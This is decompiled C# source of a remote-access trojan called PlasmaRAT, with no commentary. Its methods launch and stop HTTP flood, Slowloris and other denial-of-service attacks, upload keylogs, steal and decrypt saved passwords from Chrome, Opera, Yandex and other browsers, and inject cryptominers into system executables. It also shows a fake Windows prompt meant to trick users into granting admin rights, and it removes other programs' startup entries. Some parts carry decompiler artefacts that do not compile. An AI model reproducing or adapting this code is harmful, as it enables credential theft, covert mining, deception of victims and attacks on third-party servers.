// Token: 0x0600000C RID: 12 RVA: 0x00002D00 File Offset: 0x00000F00
public static void StopARME()
{
if (ARME.AttackRunning)
{
int num = 0;
int num2 = ARME.ThreadstoUse - 1;
for (int i = num; i <= num2; i++)
{
try
{
ARME.Threads[i].Abort();
}
catch (Exception ex)
{
}
}
ARME.AttackRunning = false;
PlasmaRAT.TalktoChannel("ARME Attack on " + ARME.HostToAttack + " aborted successfully. Attacks Sent: " + ARME.Attacks.ToString(), "");
ARME.Attacks = 0;
}
else
{
PlasmaRAT.TalktoChannel("ARME Attack:, ", "Not Running!");
}
}
// Token: 0x06000011 RID: 17 RVA: 0x00003024 File Offset: 0x00001224
public static void StopBandwidthFlood()
{
if (HTTPGet.AttackRunning)
{
int num = 0;
int num2 = HTTPGet.ThreadstoUse - 1;
for (int i = num; i <= num2; i++)
{
try
{
HTTPGet.Threads[i].Abort();
}
catch (Exception ex)
{
}
}
HTTPGet.AttackRunning = false;
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"Bandwidth Flood on ",
HTTPGet.HostToAttack,
" aborted successfully, downloading the file ",
HTTPGet.attacks.ToString(),
" times."
}), "");
HTTPGet.attacks = 0;
}
else
{
PlasmaRAT.TalktoChannel("No Bandwidth Flood Attack is Running!", "");
}
}
// Token: 0x06000020 RID: 32 RVA: 0x000038EC File Offset: 0x00001AEC
public static void StopPOSTHTTP()
{
if (PostHTTP.AttackRunning)
{
int num = 0;
int num2 = PostHTTP.ThreadstoUse - 1;
for (int i = num; i <= num2; i++)
{
try
{
PostHTTP.Threads[i].Abort();
}
catch (Exception ex)
{
}
}
PostHTTP.AttackRunning = false;
PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " aborted successfully. Attacks Sent: " + PostHTTP.attacks.ToString(), "");
PostHTTP.attacks = 0;
}
else
{
PlasmaRAT.TalktoChannel("No HTTP POST Attack is Running!", "");
}
}
// Token: 0x0600001E RID: 30 RVA: 0x000037A0 File Offset: 0x000019A0
public static void StartPOSTHTTP(string Host, int Threadsto, int Time, string data)
{
if (!PostHTTP.AttackRunning)
{
PostHTTP.AttackRunning = true;
PostHTTP.HostToAttack = Host;
PostHTTP.PostDATA = data;
PostHTTP.ThreadstoUse = Threadsto;
PostHTTP.TimetoAttack = Time;
PostHTTP.Threads = new Thread[Threadsto - 1 + 1];
PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " started!", "");
int num = 0;
int num2 = Threadsto - 1;
for (int i = num; i <= num2; i++)
{
PostHTTP.Threads[i] = new Thread(new ThreadStart(PostHTTP.DoWork));
PostHTTP.Threads[i].IsBackground = true;
PostHTTP.Threads[i].Start();
}
}
else
{
PlasmaRAT.TalktoChannel("A HTTP POST Attack is Already Running on " + PostHTTP.HostToAttack, "");
}
}
// Token: 0x06000025 RID: 37 RVA: 0x00003BE8 File Offset: 0x00001DE8
public static void StopSlowloris()
{
if (Slowloris.AttackRunning)
{
int num = 0;
int num2 = Slowloris.ThreadstoUse - 1;
for (int i = num; i <= num2; i++)
{
try
{
Slowloris.Threads[i].Abort();
}
catch (Exception ex)
{
}
}
Slowloris.AttackRunning = false;
PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " aborted successfully. Attacks Sent: " + Slowloris.attacks.ToString(), "");
Slowloris.attacks = 0;
}
else
{
PlasmaRAT.TalktoChannel("No Slowloris Attack is Running!", "");
}
}
// Token: 0x0600003E RID: 62 RVA: 0x0000448C File Offset: 0x0000268C
public static void SearchLogs(string query)
{
try
{
string text = PlasmaRAT.AES_Decrypt(File.ReadAllText(Logger.KeyLogFile));
if (text.Contains(query))
{
string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "PROCID", "");
PlasmaRAT.Send(string.Concat(new string[]
{
"KEYLOGS*",
Environment.UserName.ToString(),
".",
setting,
"*",
text,
"\r\n",
Logger.KeyLogs
}));
PlasmaRAT.TalktoChannel("Found Query in Keylogs, Uploaded Successfully!", string.Empty);
}
}
catch (Exception ex)
{
}
}
// Token: 0x0600001F RID: 31 RVA: 0x0000386C File Offset: 0x00001A6C
private static void lol()
{
PostHTTP.ThreadsEnded = Operators.AddObject(PostHTTP.ThreadsEnded, 1);
if (Operators.ConditionalCompareObjectEqual(PostHTTP.ThreadsEnded, PostHTTP.ThreadstoUse, false))
{
PostHTTP.ThreadsEnded = 0;
PostHTTP.ThreadstoUse = 0;
PostHTTP.AttackRunning = false;
PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " finished successfully. Attacks Sent: " + PostHTTP.attacks.ToString(), "");
PostHTTP.attacks = 0;
}
}
// Token: 0x0600001A RID: 26 RVA: 0x000035F4 File Offset: 0x000017F4
private static void lol()
{
BandwidthFlood.ThreadsEnded = Operators.AddObject(BandwidthFlood.ThreadsEnded, 1);
if (Operators.ConditionalCompareObjectEqual(BandwidthFlood.ThreadsEnded, BandwidthFlood.ThreadstoUse, false))
{
BandwidthFlood.ThreadsEnded = 0;
BandwidthFlood.ThreadstoUse = 0;
BandwidthFlood.AttackRunning = false;
PlasmaRAT.TalktoChannel("HTTP GET Attack on " + BandwidthFlood.HostToAttack + " finished successfully. Attacks Sent: " + BandwidthFlood.Attacks.ToString(), "");
BandwidthFlood.Attacks = 0;
}
}
// Token: 0x06000024 RID: 36 RVA: 0x00003B68 File Offset: 0x00001D68
private static void lol()
{
Slowloris.ThreadsEnded = Operators.AddObject(Slowloris.ThreadsEnded, 1);
if (Operators.ConditionalCompareObjectEqual(Slowloris.ThreadsEnded, Slowloris.ThreadstoUse, false))
{
Slowloris.ThreadsEnded = 0;
Slowloris.ThreadstoUse = 0;
Slowloris.AttackRunning = false;
PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " finished successfully. Attacks Sent: " + Slowloris.attacks.ToString(), "");
Slowloris.attacks = 0;
}
}
// Token: 0x0600003D RID: 61 RVA: 0x00004434 File Offset: 0x00002634
public static void DeleteLogs()
{
try
{
if (File.Exists(Logger.KeyLogFile))
{
File.WriteAllText(Logger.KeyLogFile, string.Empty);
}
PlasmaRAT.TalktoChannel("Keylogs deleted Successfully!", string.Empty);
}
catch (Exception ex)
{
}
}
// Token: 0x06000083 RID: 131 RVA: 0x0000868C File Offset: 0x0000688C
public static void passwordsz()
{
try
{
string[] array = new string[]
{
Environment.GetEnvironmentVariable("LocalAppData") + "\\Google\\Chrome\\User Data\\Default\\Login Data",
Environment.GetEnvironmentVariable("LocalAppData") + "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data",
Environment.GetEnvironmentVariable("LocalAppData") + "\\Kometa\\User Data\\Default\\Login Data",
Environment.GetEnvironmentVariable("LocalAppData") + "\\Amigo\\User\\User Data\\Default\\Login Data",
Environment.GetEnvironmentVariable("LocalAppData") + "\\Torch\\User Data\\Default\\Login Data",
Environment.GetEnvironmentVariable("LocalAppData") + "\\Orbitum\\User Data\\Default\\Login Data",
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Login Data"
};
foreach (string text in array)
{
SQLiteHandler sqliteHandler = new SQLiteHandler(text);
sqliteHandler.ReadTable("logins");
if (File.Exists(text))
{
int num = 0;
int num2 = sqliteHandler.GetRowCount() - 1;
for (int j = num; j <= num2; j++)
{
string value = sqliteHandler.GetValue(j, "origin_url");
string value2 = sqliteHandler.GetValue(j, "username_value");
string text2 = Passwords.Decrypt(Encoding.Default.GetBytes(sqliteHandler.GetValue(j, "password_value")));
if (Operators.CompareString(value2, "", false) != 0 & Operators.CompareString(text2, "", false) != 0)
{
Thread.Sleep(2000);
PlasmaRAT.Send(string.Concat(new string[]
{
"PASS*",
value,
"*",
value2,
"*",
text2,
"*"
}));
}
}
}
}
}
catch (Exception ex)
{
}
}
// Token: 0x06000089 RID: 137 RVA: 0x00008BB0 File Offset: 0x00006DB0
public static void BeginGPUMiner()
{
try
{
if (!GPUMiner.RanGPUMiner)
{
string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "vir32", "");
if (Operators.CompareString(setting, string.Empty, false) != 0)
{
string[] array = Strings.Split(setting, "*", -1, CompareMethod.Binary);
string optionalArguments = string.Concat(new string[]
{
"-a scrypt -o ",
array[1],
" ",
array[2],
" -p ",
array[3],
" -g yes --i -10"
});
if (File.Exists(Conversions.ToString(GPUMiner.GPUMinerFile)))
{
Persistence.AllowAccess(Conversions.ToString(GPUMiner.GPUMinerFile));
byte[] input = MyProject.Computer.FileSystem.ReadAllBytes(Conversions.ToString(GPUMiner.GPUMinerFile));
byte[] array2 = Miner.Proper_RC4(input, Encoding.UTF8.GetBytes(PlasmaRAT.Username));
Array.Reverse(array2, 0, array2.Length);
if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "csc.exe", optionalArguments))
{
GPUMiner.RanGPUMiner = true;
GPUMiner.GPUMinerExecutable = "csc";
}
else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "vbc.exe", optionalArguments))
{
GPUMiner.RanGPUMiner = true;
GPUMiner.GPUMinerExecutable = "vbc";
}
if (GPUMiner.RanGPUMiner)
{
PlasmaRAT.TalktoChannel("Started GPU Mining on: " + PlasmaRAT.GetVideoCard(), string.Empty);
}
}
}
}
}
catch (Exception ex)
{
}
}
// Token: 0x06000010 RID: 16 RVA: 0x00002F74 File Offset: 0x00001174
private static void lol()
{
HTTPGet.ThreadsEnded = Operators.AddObject(HTTPGet.ThreadsEnded, 1);
if (Operators.ConditionalCompareObjectEqual(HTTPGet.ThreadsEnded, HTTPGet.ThreadstoUse, false))
{
HTTPGet.ThreadsEnded = 0;
HTTPGet.ThreadstoUse = 0;
HTTPGet.AttackRunning = false;
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"Bandwidth Flood on ",
HTTPGet.HostToAttack,
" finished successfully, downloading the file ",
HTTPGet.attacks.ToString(),
" times."
}), "");
HTTPGet.attacks = 0;
}
}
// Token: 0x06000015 RID: 21 RVA: 0x00003298 File Offset: 0x00001498
private static void lol()
{
Condis.ThreadsEnded = Operators.AddObject(Condis.ThreadsEnded, 1);
if (Operators.ConditionalCompareObjectEqual(Condis.ThreadsEnded, Condis.ThreadstoUse, false))
{
Condis.ThreadsEnded = 0;
Condis.ThreadstoUse = 0;
Condis.AttackRunning = false;
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"Condis Attack on ",
Condis.HostToAttack,
":",
Condis.Port.ToString(),
" finished successfully. Attacks Sent: ",
Condis.attacks.ToString()
}), "");
Condis.attacks = 0;
}
}
// Token: 0x0600003F RID: 63 RVA: 0x0000456C File Offset: 0x0000276C
public static void SaveLogs()
{
for (;;)
{
try
{
if (Logger.KeyLogs.Length > 150)
{
Persistence.AllowAccess(Logger.KeyLogFile);
string str = PlasmaRAT.AES_Decrypt(File.ReadAllText(Logger.KeyLogFile));
File.WriteAllText(Logger.KeyLogFile, PlasmaRAT.AES_Encrypt(str + Logger.KeyLogs));
Logger.KeyLogs = string.Empty;
}
}
catch (Exception ex)
{
}
Thread.Sleep(1000);
}
}
// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78
public static void RunAVAdminMode()
{
try
{
string text = Path.GetTempPath() + "HardwareCheck.exe";
if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0)
{
if (!File.Exists(text))
{
File.Copy(Application.ExecutablePath, text);
}
ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[]
{
"/c ",
text,
"\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ",
Environment.UserName.ToString().ToString(),
"\r\nProcessor Count: ",
Environment.ProcessorCount.ToString(),
"\r\nOperating System: ",
MyProject.Computer.Info.OSFullName
}));
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
processStartInfo.UseShellExecute = true;
processStartInfo.WorkingDirectory = Environment.CurrentDirectory;
processStartInfo.Verb = "runas";
try
{
Process.Start(processStartInfo);
Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran");
PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty);
}
catch (Exception ex)
{
}
}
}
catch (Exception ex2)
{
}
}
// Token: 0x06000023 RID: 35 RVA: 0x00003A20 File Offset: 0x00001C20
public static void StartSlowloris(string Host, int Threadsto, int Time, string data)
{
if (!Slowloris.AttackRunning)
{
Slowloris.AttackRunning = true;
Slowloris.HostToAttack = Host;
Slowloris.PostDATA = data;
Slowloris.ThreadstoUse = Threadsto;
Slowloris.TimetoAttack = Time;
if (Slowloris.HostToAttack.Contains("http://"))
{
Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("http://", string.Empty);
}
if (Slowloris.HostToAttack.Contains("www."))
{
Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("www.", string.Empty);
}
if (Slowloris.HostToAttack.Contains("/"))
{
Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("/", string.Empty);
}
Slowloris.Threads = new Thread[Threadsto - 1 + 1];
PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " started!", "");
int num = 0;
int num2 = Threadsto - 1;
for (int i = num; i <= num2; i++)
{
Slowloris.Threads[i] = new Thread(new ThreadStart(Slowloris.DoWork));
Slowloris.Threads[i].IsBackground = true;
Slowloris.Threads[i].Start();
}
}
else
{
PlasmaRAT.TalktoChannel("A Slowloris Attack is Already Running on " + Slowloris.HostToAttack, "");
}
}
// Token: 0x06000019 RID: 25 RVA: 0x00003530 File Offset: 0x00001730
public static void StartHTTPGet(string Host, int Threadsto, int Time)
{
if (!BandwidthFlood.AttackRunning)
{
BandwidthFlood.AttackRunning = true;
BandwidthFlood.HostToAttack = Host;
BandwidthFlood.ThreadstoUse = Threadsto;
BandwidthFlood.TimetoAttack = Time;
BandwidthFlood.Threads = new Thread[Threadsto - 1 + 1];
PlasmaRAT.TalktoChannel("HTTP GET Attack on " + BandwidthFlood.HostToAttack + " started!", "");
int num = 0;
int num2 = Threadsto - 1;
for (int i = num; i <= num2; i++)
{
BandwidthFlood.Threads[i] = new Thread(new ThreadStart(BandwidthFlood.DoWork));
BandwidthFlood.Threads[i].IsBackground = true;
BandwidthFlood.Threads[i].Start();
}
}
else
{
PlasmaRAT.TalktoChannel("A HTTP GET Attack is Already Running on " + BandwidthFlood.HostToAttack, "");
}
}
// Token: 0x060000AD RID: 173 RVA: 0x0000B2EC File Offset: 0x000094EC
public static void SeedTorrent(string path)
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (!Torrent.IsVuze())
{
goto IL_33;
}
IL_10:
num2 = 3;
Torrent.SeedItVuze(Torrent.VuzePath, path);
IL_1D:
num2 = 4;
PlasmaRAT.TalktoChannel("Seeding Torrent With Vuze", string.Empty);
IL_2E:
goto IL_143;
IL_33:
num2 = 6;
if (!Torrent.IsBitTorrent())
{
goto IL_64;
}
IL_3C:
num2 = 7;
Torrent.SeedIt(Torrent.BitLocalPath, Torrent.BitLocalPath, path);
IL_4E:
num2 = 8;
PlasmaRAT.TalktoChannel("Seeding Torrent with BitTorrent", string.Empty);
IL_5F:
goto IL_143;
IL_64:
num2 = 10;
if (!Torrent.IsUtorrent())
{
goto IL_98;
}
IL_6E:
num2 = 11;
Torrent.SeedIt(Torrent.UTorrentPath, Torrent.UTorrentLocalPath, path);
IL_81:
num2 = 12;
PlasmaRAT.TalktoChannel("Seeding Torrent with uTorrent", string.Empty);
IL_93:
goto IL_143;
IL_98:
num2 = 14;
IL_9B:
num2 = 15;
PlasmaRAT.TalktoChannel("Unable to Seed: No Torrent Client Installed", string.Empty);
IL_AD:
goto IL_143;
IL_B2:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_104:
goto IL_138;
IL_106:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_116 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_106;
}
IL_138:
throw ProjectData.CreateProjectError(-2146828237);
IL_143:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x0600008F RID: 143 RVA: 0x0000910C File Offset: 0x0000730C
public static void BeginMiner()
{
try
{
if (!Miner.RanMiner)
{
string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "id", "");
if (Operators.CompareString(setting, string.Empty, false) != 0)
{
string[] array = Strings.Split(setting, "*", -1, CompareMethod.Binary);
if (File.Exists(Conversions.ToString(Miner.PoolerMiner)))
{
Persistence.AllowAccess(Conversions.ToString(Miner.PoolerMiner));
int num = Environment.ProcessorCount;
if (num == 0)
{
num = 1;
}
if (num == 2)
{
num = 1;
}
if (num == 3)
{
num = 2;
}
if (num == 4)
{
num = 3;
}
if (num == 6)
{
num = 4;
}
if (num == 8)
{
num = 6;
}
if (num == 12)
{
num = 10;
}
if (num == 16)
{
num = 14;
}
byte[] input = MyProject.Computer.FileSystem.ReadAllBytes(Conversions.ToString(Miner.PoolerMiner));
byte[] array2 = Miner.Proper_RC4(input, Encoding.UTF8.GetBytes(PlasmaRAT.Username));
Array.Reverse(array2, 0, array2.Length);
string optionalArguments = string.Concat(new string[]
{
"-a scrypt -o ",
array[1],
" -O ",
array[2],
":",
array[3],
" -t",
num.ToString()
});
if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "cvtres.exe", optionalArguments))
{
Miner.RanMiner = true;
Miner.MinerExecutable = "cvtres";
}
else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "vbc.exe", optionalArguments))
{
Miner.RanMiner = true;
Miner.MinerExecutable = "vbc";
}
else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "csc.exe", optionalArguments))
{
Miner.RanMiner = true;
Miner.MinerExecutable = "csc";
}
else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "ngen.exe", optionalArguments))
{
Miner.RanMiner = true;
Miner.MinerExecutable = "ngen";
}
Miner.SetScreenSaverActive(false);
if (Miner.RanMiner)
{
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"Miner: Injected into ",
Miner.MinerExecutable,
".exe. Started Mining With ",
num.ToString(),
" Cores."
}), string.Empty);
}
else
{
PlasmaRAT.TalktoChannel("Miner: Failed to Inject.", string.Empty);
}
}
}
}
else
{
PlasmaRAT.TalktoChannel("Miner: Already Running on System", string.Empty);
}
}
catch (Exception ex)
{
PlasmaRAT.TalktoChannel("Miner: Failed to Inject File.", string.Empty);
}
}
// Token: 0x06000091 RID: 145 RVA: 0x000094EC File Offset: 0x000076EC
public static void RemoveMiner()
{
int num;
int num4;
object obj2;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "id", "");
IL_23:
num2 = 3;
if (Operators.CompareString(setting, string.Empty, false) == 0)
{
goto IL_FC;
}
IL_37:
num2 = 4;
Interaction.SaveSetting("Microsoft", "Sysinternals", "id", string.Empty);
IL_52:
num2 = 5;
IEnumerator enumerator = ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[]
{
"Select Name from Win32_Process Where Name = '" + Miner.MinerExecutable + ".exe'"
}, null, null, null)).GetEnumerator();
while (enumerator.MoveNext())
{
object obj = enumerator.Current;
object objectValue = RuntimeHelpers.GetObjectValue(obj);
IL_A8:
num2 = 6;
NewLateBinding.LateCall(objectValue, null, "Terminate", new object[0], null, null, null, true);
IL_C2:
num2 = 7;
}
if (enumerator is IDisposable)
{
(enumerator as IDisposable).Dispose();
}
IL_E2:
num2 = 8;
Miner.RanMiner = false;
IL_EA:
num2 = 9;
PlasmaRAT.TalktoChannel("CPU Miner: Stopped Successfully.", string.Empty);
IL_FC:
goto IL_17B;
IL_FE:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_13A:
goto IL_170;
IL_13C:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_14D :;
}
catch when(endfilter(obj2 is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj3;
goto IL_13C;
}
IL_170:
throw ProjectData.CreateProjectError(-2146828237);
IL_17B:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C
public static object HardBotKill()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (AntiEverything.AntisDetected)
{
goto IL_AB;
}
IL_13:
num2 = 3;
BotKillers.RunStartupKiller();
IL_1A:
num2 = 4;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_32:
num2 = 5;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_4A:
num2 = 6;
BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
IL_57:
num2 = 7;
if (!AntiEverything.IsAdmin())
{
goto IL_91;
}
IL_60:
num2 = 8;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_78:
num2 = 9;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_91:
num2 = 11;
BotKillers.ScanProcess();
IL_99:
num2 = 12;
PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty);
IL_AB:
goto IL_135;
IL_B0:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_F6:
goto IL_12A;
IL_F8:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_108 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_F8;
}
IL_12A:
throw ProjectData.CreateProjectError(-2146828237);
IL_135:
object obj3;
object result = obj3;
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return(result);
}
// Token: 0x06000053 RID: 83 RVA: 0x00005794 File Offset: 0x00003994
public static void RunStandardBotKiller()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
BotKillers.ScanProcess();
IL_0E:
num2 = 3;
BotKillers.RunStartupKiller();
IL_15:
num2 = 4;
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"BotKiller: Processes Killed: ",
BotKillers.ProccessKilled.ToString(),
". Startup Items Killed: ",
BotKillers.Startupkilled.ToString(),
"."
}), "");
IL_74:
num2 = 5;
BotKillers.ProccessKilled = 0;
IL_7C:
num2 = 6;
BotKillers.Startupkilled = 0;
IL_84:
goto IL_EF;
IL_86:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_B0:
goto IL_E4;
IL_B2:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_C2 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_B2;
}
IL_E4:
throw ProjectData.CreateProjectError(-2146828237);
IL_EF:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
